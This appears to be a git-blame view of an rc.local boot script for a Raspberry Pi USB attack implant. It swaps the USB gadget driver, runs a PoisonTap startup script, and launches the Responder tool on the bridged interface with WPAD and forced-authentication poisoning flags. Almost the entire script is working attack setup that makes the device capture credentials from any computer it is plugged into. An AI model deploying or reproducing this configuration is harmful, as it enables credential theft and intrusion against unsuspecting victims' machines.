2017-01-04 12:46:47 -05:00
|
|
|
#!/bin/sh -e
|
|
|
|
#
|
|
|
|
# rc.local
|
|
|
|
#
|
|
|
|
# This script is executed at the end of each multiuser runlevel.
|
|
|
|
# Make sure that the script will "exit 0" on success or any other
|
|
|
|
# value on error.
|
|
|
|
#
|
|
|
|
# In order to enable or disable this script just change the execution
|
|
|
|
# bits.
|
|
|
|
#
|
|
|
|
# By default this script does nothing.
|
|
|
|
|
|
|
|
# Print the IP address
|
|
|
|
_IP=$(hostname -I) || true
|
|
|
|
if [ "$_IP" ]; then
|
|
|
|
printf "My IP address is %s\n" "$_IP"
|
|
|
|
fi
|
|
|
|
|
2017-01-14 18:03:21 -05:00
|
|
|
# Parse USB requests in dmesg
|
|
|
|
/bin/bash /home/pi/umap/usbreq.sh | tee /home/pi/os.txt
|
|
|
|
|
|
|
|
# Stop the dummy gadget and start the real one
|
|
|
|
modprobe -r g_ether
|
|
|
|
modprobe libcomposite
|
|
|
|
|
2017-01-04 12:46:47 -05:00
|
|
|
# libcomposite configuration
|
2017-01-04 12:48:50 -05:00
|
|
|
/bin/sh /home/pi/poisontap/pi_startup.sh | tee /home/pi/poisontap/pi_startup.log
|
2017-01-04 12:46:47 -05:00
|
|
|
|
|
|
|
# Clear leases
|
|
|
|
#rm -f /var/lib/dhcp/dhcpd.leases
|
|
|
|
#touch /var/lib/dhcp/dhcpd.leases
|
|
|
|
|
|
|
|
# Start DHCP server
|
|
|
|
#/usr/sbin/dhcpd
|
|
|
|
|
|
|
|
# Start Responder
|
|
|
|
/usr/bin/screen -dmS responder bash -c 'cd /home/pi/Responder/; python Responder.py -I br0 -f -w -r -d -F' | tee /home/pi/Responder.log
|
|
|
|
|
|
|
|
exit 0
|